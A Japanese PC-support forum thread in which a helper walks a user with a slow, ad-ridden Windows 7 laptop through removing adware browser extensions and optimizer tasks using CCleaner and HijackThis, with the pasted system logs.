TOSHIBA Media Controller Plug-in TOSHIBA CORPORATION 2012/04/24 6.65 MB 1.0.7.7
TOSHIBA PalaDouga TOSHIBA CORPORATION 2011/11/22 767 MB 2012.0101.0001
TOSHIBA PC Health Monitor TOSHIBA Corporation 2012/04/24 28.9 MB 1.7.11.64
TOSHIBA Peak Shift Control TOSHIBA Corporation 3.00.05.64
TOSHIBA Recovery Media Creator TOSHIBA CORPORATION 2011/11/22 2.1.5.5109a
TOSHIBA ReelTime TOSHIBA Corporation 2012/04/24 1.7.21.64
TOSHIBA Resolution+ Plug-in for Windows Media Player TOSHIBA Corporation 2012/04/24 1.1.2003
TOSHIBA SD-Video PLAYER TOSHIBA Corporation 2012/04/24 1.00.2.21-B
TOSHIBA Service Station TOSHIBA 2012/04/24 2.2.13
TOSHIBA Sleep Utility TOSHIBA Corporation 2012/04/24 1.4.2.9
TOSHIBA Speech Synthesis TOSHIBA CORPORATION 2012/04/24 65.0 MB 1.5.0.1
TOSHIBA Supervisor Password TOSHIBA 2012/04/24 4.08.09.00
TOSHIBA Sync Utility TOSHIBA Corporation 2011/11/22 2.0.3090
TOSHIBA Value Added Package TOSHIBA Corporation 2012/04/24 131 MB 1.6.16.64
TOSHIBA VIDEO PLAYER TOSHIBA Corporation 2012/04/24 45.9 MB 5.0.0.4-B
TOSHIBA Web Camera Application TOSHIBA Corporation 2012/04/24 65.2 MB 2.0.3.29
TOSHIBA Wireless Display Monitor TOSHIBA CORPORATION 2012/04/24 1.68 MB 1.0.1
TOSHIBA Wireless LAN Indicator TOSHIBA CORPORATION 2012/04/24 5.06 MB 1.0.5
TOSHIBA 無線LANらくらく設定 TOSHIBA CORPORATION 2011/11/22 18.2 MB 2.0.10.0628.1115n
Windows Live Essentials Microsoft Corporation 2011/11/22 15.4.3502.0922
いつもNAVI PC ZENRIN 2011/11/22 6.1.2
おたすけナビ 東芝情報機器株式会社 2011/11/22 20.9 MB 6.1.3
おまかせフォトムービー TOSHIBA CORPORATION 2012/04/24 139 MB 1.1.2000.1
てぶらナビ TOSHIBA CORPORATION 2012/04/24 22.8 MB 1.5.1.5
インテル(R) PROSet/Wireless WiFi ソフトウェア Intel Corporation 2012/04/24 130 MB 14.01.1000
スタートアップツール 西日本電信電話株式会社 2012/06/23 2.60 MB 6.0
セキュリティ対策ツール 西日本電信電話株式会社 2015/04/27 450 MB 8.11
セキュリティ申込・設定ツール 西日本電信電話株式会社 2015/04/27 3.58 MB 7.1.0.7
レグザリンク・ダビング TOSHIBA CORPORATION 2012/04/24 1.0.11.1-A
動画で解決!操作ガイド 東芝情報機器株式会社 2011/11/22 15.9 MB 2.1.3
動画で解決!操作ガイド-コンテンツ- 東芝情報機器株式会社 2011/11/22 148 KB 2.1.3
東芝HDD/SSDアラータ TOSHIBA Corporation 2012/04/24 55.0 MB 3.1.64.9
東芝ピークシフトコントロール TOSHIBA Corporation 2012/04/24 3.00.05.64
東芝プレイス ダイジェストワード TOSHIBA CORPORATION 2012/12/16 7.40 MB 1.0.1
東芝プレイスガジェット TOSHIBA CORPORATION 2012/04/24 2.81 MB 3.0.3
東芝プレイスガジェット用ライブラリ TOSHIBA CORPORATION 2011/11/22 997 KB 2.0.0
筆ぐるめ Ver.19 富士ソフト株式会社 2011/11/22 587 MB 19.00.0000
診断復旧ツール 西日本電信電話株式会社 2014/05/07 12.5 MB

有効 HKCU:Run CCleaner Monitoring Piriform Ltd "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
有効 HKCU:Run EPLTarget\P0000000000000000 SEIKO EPSON CORPORATION C:\windows\system32\spool\DRIVERS\x64\3\E_IATIHKJ.EXE /EPT "EPLTarget\P0000000000000000" /M "PX-404A"
有効 HKLM:Run cAudioFilterAgent Conexant Systems, Inc. C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe
有効 HKLM:Run EEventManager SEIKO EPSON CORPORATION "C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe"
有効 HKLM:Run HotKeysCmds Intel Corporation C:\windows\system32\hkcmd.exe
有効 HKLM:Run IgfxTray Intel Corporation C:\windows\system32\igfxtray.exe
有効 HKLM:Run IME14 JPN Setup Microsoft Corporation C:\PROGRA~2\COMMON~1\MICROS~1\IME14\SHARED\IMEKLMG.EXE /SetPreload /JPN /Log
有効 HKLM:Run IntelPAN Intel(R) Corporation "C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe" /tf Intel PAN Tray
有効 HKLM:Run LLHDUSER Intercom, Inc. "C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe"
有効 HKLM:Run NTTW_OSA_AUS 西日本電信電話株式会社 "C:\Program Files (x86)\NTTW\OSA_Aus\acs.exe" -silent
有効 HKLM:Run Persistence Intel Corporation C:\windows\system32\igfxpers.exe
有効 HKLM:Run Platinum Trend Micro Inc. "C:\Program Files\NTTW\Security\SEC\plugin\Pt\PtSessionAgent.exe" -StartUp
有効 HKLM:Run SmartAudio Conexant systems, Inc. C:\Program Files\CONEXANT\SAII\SAIICpl.exe /t
有効 HKLM:Run SynTPEnh Synaptics Incorporated %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe
有効 HKLM:Run TCrdMain TOSHIBA Corporation %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
有効 HKLM:Run Teco "%ProgramFiles%\TOSHIBA\TECO\Teco.exe" /r
有効 HKLM:Run ToshibaPlacesGadget TOSHIBA CORPORATION "C:\Program Files (x86)\Toshiba Places Gadget\ToshibaPlacesGadget.exe" -atboottime
有効 HKLM:Run ToshibaServiceStation TOSHIBA Corporation "C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" /hide:60
有効 HKLM:Run TosNC TOSHIBA Corporation %ProgramFiles%\Toshiba\BulletinBoard\TosNcCore.exe
有効 HKLM:Run TosReelTimeMonitor TOSHIBA Corporation %ProgramFiles%\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
有効 HKLM:Run TosSENotify TOSHIBA Corporation C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe
有効 HKLM:Run TosWaitSrv TOSHIBA Corporation %ProgramFiles%\TOSHIBA\TPHM\TosWaitSrv.exe
有効 HKLM:Run TouchFree TOSHIBA Corporation C:\Program Files (x86)\TOSHIBA\TouchFree\TouchFreeTray.exe
有効 HKLM:Run TPSCMain TOSHIBA Corporation %ProgramFiles%\TOSHIBA\PeakShift\TPSCMain.exe
有効 HKLM:Run TPwrMain TOSHIBA Corporation %ProgramFiles%\TOSHIBA\Power Saver\TPwrMain.EXE
有効 HKLM:Run Trend Micro Client Framework Trend Micro Inc. "C:\Program Files\NTTW\Security\UniClient\UiFrmWrk\UIWatchDog.exe"
有効 HKLM:Run TSleepSrv TOSHIBA %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
有効 HKLM:Run TSUScheduler TOSHIBA Corporation %ProgramFiles(x86)%\TOSHIBA\Sync Utility\TosSyncScheduler.exe
有効 HKLM:Run Unattend0000000001{7EEC0247-1AD3-4C6D-95A0-BC5399CB7B8A} AnywhereWorking L.T.D. C:\tosutils\palakidou\palakidou.exe
有効 Startup Common クライアントマネージャV.lnk BUFFALO INC. C:\Program Files (x86)\BUFFALO\clientmgrv\bin\cmvMain.exe

有効 Extension OneNote に送る Microsoft Corporation C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
有効 Extension OneNote に送る Microsoft Corporation C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
有効 Extension OneNote リンク ノート(K) Microsoft Corporation C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
有効 Extension OneNote リンク ノート(K) Microsoft Corporation C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
有効 Extension TOSHIBA Bulletin Boardへ追加 TODO: <会社名> C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
有効 Extension TOSHIBA Bulletin Boardへ追加 TODO: <会社名> C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom64.dll
有効 Extension このコンテンツを引用 Microsoft Corporation C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
有効 Extension 故障かな?と思ったら・・・ 西日本電信電話株式会社 C:\Program Files (x86)\NTTW\OSA_SupportTool\start_w.exe
無効 Helper E-Photo SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Photo\EPTBL.dll
無効 Helper E-Web Print SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
有効 Helper ExplorerWnd Helper IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll
無効 Helper Office Document Cache Handler Microsoft Corporation C:\PROGRA~2\MICROS~4\Office14\URLREDIR.DLL
無効 Helper Office Document Cache Handler Microsoft Corporation C:\PROGRA~1\MICROS~2\Office14\URLREDIR.DLL
無効 Helper TmBpIeBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll
無効 Helper TmBpIeBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe64.dll
有効 Helper TmIEPlugInBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg32.dll
有効 Helper TmIEPlugInBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg.dll
無効 Helper TOSHIBA Media Controller Plug-in <TOSHIBA> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll
無効 Helper TOSHIBA Media Controller Plug-in <TOSHIBA> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll
無効 Helper TSToolbarBHO Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
無効 Helper TSToolbarBHO Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\plugin\ToolbarIE64\ToolbarIE.dll
無効 Helper Windows Live ID Sign-in Helper Microsoft Corp. C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
無効 Helper Windows Live ID サインイン ヘルパー Microsoft Corp. C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
無効 Helper 東芝プレイス ダイジェストワード用ライブラリ TOSHIBA CORPORATION C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon.dll
無効 Helper 東芝プレイス ダイジェストワード用ライブラリ TOSHIBA CORPORATION C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon64.dll
無効 Toolbar E-Photo SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Photo\EPTBL.dll
無効 Toolbar E-Web Print SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
無効 Toolbar セキュリティツールバー Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
無効 Toolbar セキュリティツールバー Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\plugin\ToolbarIE64\ToolbarIE.dll

無効 Extension Browsers Apps 0.95.18 browser default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\herman.thorne45@outlook.com
無効 Extension ClickForSale 1.9 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\Na@4skpeF6a.org
無効 Extension E-Web Print 1.09.00 SEIKO EPSON CORPORATION default C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on
無効 Extension Hold Page 1.0.1 Hold Page default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\{15738250-181b-41cd-b01d-621a833a541c}.xpi
無効 Extension ProShopper 4.87 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\w1@bVfSQOc5.com
無効 Extension SilentBlockschuzakjp 0.95.949 Schuzak default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\SilentBlock@schuzak.jp
無効 Extension Skype Click to Call 7.3.16540.9015 Microsoft Corporation default C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi
無効 Extension Trend Micro BEP Firefox Extension 7.5.0.1144 Trend Micro default C:\Program Files\NTTW\Security\AMSP\Module\20002\7.5.1144\7.5.1144\firefoxextension
無効 Extension Trend Micro NSC Firefox Extension 6.8.0.1096 Trend Micro default C:\Program Files\NTTW\Security\AMSP\module\20004\FxExt\firefoxextension
無効 Extension セキュリティツールバー 6.11.0.3085 繝医Ξ繝ウ繝峨・繧、繧ッ繝ュ default C:\Program Files\NTTW\Security\SEC\UIFramework\Toolbar\firefoxextension
有効 Plugin Adobe Acrobat 11.0.10.32 default C:\Program Files (x86)\Adobe\Reader 11.0\Reader\browser\nppdf32.dll
有効 Plugin Microsoft Office 2010 14.0.4730.1010 Microsoft Corporation default C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL
有効 Plugin Microsoft Office 2010 14.0.4761.1000 Microsoft Corporation default C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL
有効 Plugin Nexon Game Controller 1.0.1.2 Nexon default C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
有効 Plugin Shockwave Flash 16.0.0.305 default C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll
有効 Plugin Silverlight Plug-In 5.1.30514.0 Microsoft Corporation default c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3502.922 Microsoft Corporation default C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll

有効 Extension Trend ツールバー 8.0.0.1257 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohhcpmplhhiiaoiddkfboafbhiknefdf\8.0.0.1257_0
有効 Plugin Adobe Acrobat 10.1.4.38 最初�Eユーザー C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll
有効 Plugin Chrome PDF Viewer 最初�Eユーザー C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\pdf.dll
有効 Plugin Chrome Remote Desktop Viewer 最初�Eユーザー internal-remoting-viewer
有効 Plugin Google Update 1.3.21.123 最初�Eユーザー C:\Program Files (x86)\Google\Update\1.3.21.123\npGoogleUpdate3.dll
有効 Plugin Java Deployment Toolkit 6.0.200.2 6.0.200.2 最初�Eユーザー C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll
有効 Plugin Java(TM) Platform SE 6 U20 6.0.200.2 最初�Eユーザー C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll
有効 Plugin Microsoft Office 2010 14.0.4730.1010 最初�Eユーザー C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL
有効 Plugin Microsoft Office 2010 14.0.4761.1000 最初�Eユーザー C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL
有効 Plugin Native Client 最初�Eユーザー C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\ppGoogleNaClPluginChrome.dll
有効 Plugin Shockwave Flash 11.4.31.110 最初�Eユーザー C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\PepperFlash\pepflashplayer.dll
有効 Plugin Silverlight Plug-In 4.1.10329.0 最初�Eユーザー c:\Program Files (x86)\Microsoft Silverlight\4.1.10329.0\npctrl.dll
有効 Plugin Trend Micro Titanium 5.11.0.2107 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\heoldelcflnigdllmlopiefhkkobendj\5.11.0.2107_0\npToolbarChrome.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3502.0922_ship.wlx.w4m4 (ship) 最初�Eユーザー C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll

無効 Extension Browsers Apps 1.26.18 Opera Stable C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Extensions\ffhfoagmjcnkolneahbpagjcjjaeofbg\1.26.18_0

有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task ConfigFree Startup Programs TOSHIBA CORPORATION C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
無効 Task Driver Booster SkipUAC (Owner) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe /skipuac
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
無効 Task PC SpeedScan Pro_Owner-PC@Owner C:\Program Files (x86)\Ascentive\PC SpeedScan Pro\PCSpeedScan.exe
無効 Task Performance Center@Logon C:\Program Files (x86)\Ascentive\Performance Center\APCMain.exe -m
有効 Task Performance Center_Owner-PC@Owner C:\Program Files (x86)\Ascentive\Performance Center\APCMain.exe
有効 Task Uninstaller_SkipUac_Owner IObit C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe /UninstallExplorer

無効 Directory Advanced SystemCare
有効 Directory IObitUnstaler IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight64.dll
有効 Drive Advanced SystemCare
有効 Drive Ulead UDF Driver Ulead Systems, Inc. c:\Program Files (x86)\Common Files\Ulead Systems\DVD\USIShex.dll
有効 File IObitUnstaler IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight64.dll
有効 File {48F45200-91E6-11CE-8A4F-0080C81A28D4} Trend Micro Inc. C:\Program Files\NTTW\Security\UniClient\UiFrmwrk\tmdshell.dll
有効 Folder IObitUnstaler IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight64.dll
有効 Folder {48F45200-91E6-11CE-8A4F-0080C81A28D4} Trend Micro Inc. C:\Program Files\NTTW\Security\UniClient\UiFrmwrk\tmdshell.dll
  • T・T
  • 2015/05/06 (Wed) 17:15:01
CCで順番に処置を
作業と報告、ご苦労様です。
各ログを見せてもらいました。
ではもう少し残っているところを処置しましょう。

下記がまだ更新できてないので、使うなら更新必須です。
Skype(TM) 7.3 Skype Technologies S.A. 2015/04/23 78.4 MB 7.3.101

次にHJTでスキャン後、表示された中の下記をfixしてください。
O23 - Service: Baidu Japanese IME Service_3.5.2.45 (BaiduJP_IME_Service_3.5.2.45) - Unknown owner - (no file)

次にCCを起動して「Firefox」タブ内の下記を右クリックから「エントリの削除」です。
無効 Extension Browsers Apps 0.95.18 browser default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\herman.thorne45@outlook.com
無効 Extension ClickForSale 1.9 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\Na@4skpeF6a.org
無効 Extension ProShopper 4.87 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\w1@bVfSQOc5.com
無効 Extension SilentBlockschuzakjp 0.95.949 Schuzak default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\SilentBlock@schuzak.jp


次に「Chrome」タブの下記も同様に処置して、
無効 Extension Browsers Apps 1.26.18 Opera Stable C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Extensions\ffhfoagmjcnkolneahbpagjcjjaeofbg\1.26.18_0

「スケジュールされたタスク」タブの下記も処置してから、
無効 Task Driver Booster SkipUAC (Owner) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe /skipuac
無効 Task PC SpeedScan Pro_Owner-PC@Owner C:\Program Files (x86)\Ascentive\PC SpeedScan Pro\PCSpeedScan.exe
無効 Task Performance Center@Logon C:\Program Files (x86)\Ascentive\Performance Center\APCMain.exe -m
有効 Task Performance Center_Owner-PC@Owner C:\Program Files (x86)\Ascentive\Performance Center\APCMain.exe

「コンテキストメニュー」内の下記も同様に処置です。
無効 Directory Advanced SystemCare
有効 Drive Advanced SystemCare

ここまでできたら一度PC再起動後、そこでまた上記と同じ各ログを取り直して、それをまたレスで見せてください
  • 悪代官
  • 2015/05/06 (Wed) 22:06:32
Re: パソコン動作緩慢・広告類がひどい
遅くなりました。
幾つか消せないものがありました。

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 18:11:00, on 2015/05/10
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17728)


Boot mode: Normal

Running processes:
C:\Program Files (x86)\EPSON\MyEPSON Connect\mep.exe
C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe
C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
C:\Program Files (x86)\BUFFALO\clientmgrv\bin\cmvMain.exe
C:\Program Files (x86)\TOSHIBA\Sync Utility\TosSyncScheduler.exe
C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe
C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhrcusr.exe
C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSwMgr.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\windows\SysWOW64\cmd.exe
C:\windows\SysWOW64\cmd.exe
C:\Program Files\NTTW\Security\AMSP\module\20013\ChromeExt\chromeextension\TmopChromeMsgHost32.exe
C:\windows\SysWOW64\cmd.exe
C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\chrome_extension2\host\chrome_native_msg_host.exe
C:\Program Files\NTTW\Security\SEC\UIFramework\Toolbar\chromeextension\NativeMessageHost\ToolbarNativeMsgHost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Users\Owner\Downloads\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe,
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
O2 - BHO: Trend Micro Toolbar BHO - {43C6D902-A1C5-45c9-91F6-FD9E90337E18} - C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
O2 - BHO: CTPBIEAddonBHO - {4C149F6B-ED35-42CC-979F-77006AFA4453} - C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon.dll
O2 - BHO: Windows Live ID サインイン ヘルパー - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Trend Micro Osprey BHO - {959A5673-7971-48e6-AF54-58F745AC4ABC} - C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg32.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~4\Office14\URLREDIR.DLL
O2 - BHO: TmBpIeBHO - {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} - C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll
O2 - BHO: TOSHIBA Media Controller Plug-in - {F3C88694-EFFA-4d78-B409-54B7B2535B14} - C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll
O3 - Toolbar: E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
O3 - Toolbar: セキュリティツールバー - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
O4 - HKLM\..\Run: [TSUScheduler] %ProgramFiles(x86)%\TOSHIBA\Sync Utility\TosSyncScheduler.exe
O4 - HKLM\..\Run: [LLHDUSER] "C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe"
O4 - HKLM\..\Run: [TSleepSrv] %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
O4 - HKLM\..\Run: [ToshibaServiceStation] "C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" /hide:60
O4 - HKLM\..\Run: [TouchFree] C:\Program Files (x86)\TOSHIBA\TouchFree\TouchFreeTray.exe
O4 - HKLM\..\Run: [ToshibaPlacesGadget] "C:\Program Files (x86)\Toshiba Places Gadget\ToshibaPlacesGadget.exe" -atboottime
O4 - HKLM\..\Run: [IME14 JPN Setup] C:\PROGRA~2\COMMON~1\MICROS~1\IME14\SHARED\IMEKLMG.EXE /SetPreload /JPN /Log
O4 - HKLM\..\Run: [EEventManager] "C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe"
O4 - HKLM\..\Run: [NTTW_OSA_AUS] "C:\Program Files (x86)\NTTW\OSA_Aus\acs.exe" -silent
O4 - HKCU\..\Run: [EPLTarget\P0000000000000000] C:\windows\system32\spool\DRIVERS\x64\3\E_IATIHKJ.EXE /EPT "EPLTarget\P0000000000000000" /M "PX-404A"
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - Global Startup: クライアントマネージャV.lnk = C:\Program Files (x86)\BUFFALO\clientmgrv\bin\cmvMain.exe
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: OneNote に送る(&N) - res://C:\PROGRA~1\MICROS~2\Office14\ONBttnIE.dll/105
O8 - Extra context menu item: TOSHIBA Bulletin Boardへ追加 - res://C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll/1000
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: OneNote に送る - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: OneNote に送る(&N) - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: 故障かな?と思ったら・・・ - {6CB1FA39-5745-4733-859F-E9C82A68F848} - C:\Program Files (x86)\NTTW\OSA_SupportTool\start_w.exe
O9 - Extra button: OneNote リンク ノート(&K) - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote リンク ノート(&K) - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra button: @C:\Program Files\TOSHIBA\BulletinBoard\TosNcUi.dll,-229 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files\TOSHIBA\BulletinBoard\TosNcUi.dll,-228 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted Zone: http://dynabook.fresheye.com (HKLM)
O15 - Trusted Zone: http://www.ig.gmodules.com (HKLM)
O15 - ESC Trusted Zone: http://*.update.microsoft.com
